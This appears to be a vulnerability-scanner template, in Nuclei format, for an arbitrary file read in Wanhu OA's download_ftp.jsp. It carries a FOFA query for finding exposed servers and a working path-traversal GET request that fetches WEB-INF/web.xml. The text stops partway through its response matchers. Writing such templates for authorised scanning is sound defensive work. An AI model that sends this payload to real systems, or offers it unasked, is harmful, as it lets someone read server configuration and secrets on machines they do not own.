id: wanhu-download-ftp-file-read info: name: Wanhu OA download_ftp.jsp - Arbitrary File Read author: SleepingBag945 severity: high description: | There is an arbitrary file download vulnerability in the Wanhu OA download_ftp.jsp file. An attacker can download any file on the server through the vulnerability. reference: - http://wiki.peiqi.tech/wiki/oa/万户OA/万户OA%20download_ftp.jsp%20任意文件下载漏洞.html - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/wanhu-oa-download-ftp-file-read.yaml metadata: verified: true max-request: 1 fofa-query: app="万户网络-ezOFFICE" tags: wanhu,lfi http: - method: GET path: - "{{BaseURL}}/defaultroot/download_ftp.jsp?path=/../WEB-INF/&name=aaa&FileName=web.xml" matchers-condition: and matchers: - type: word words: - "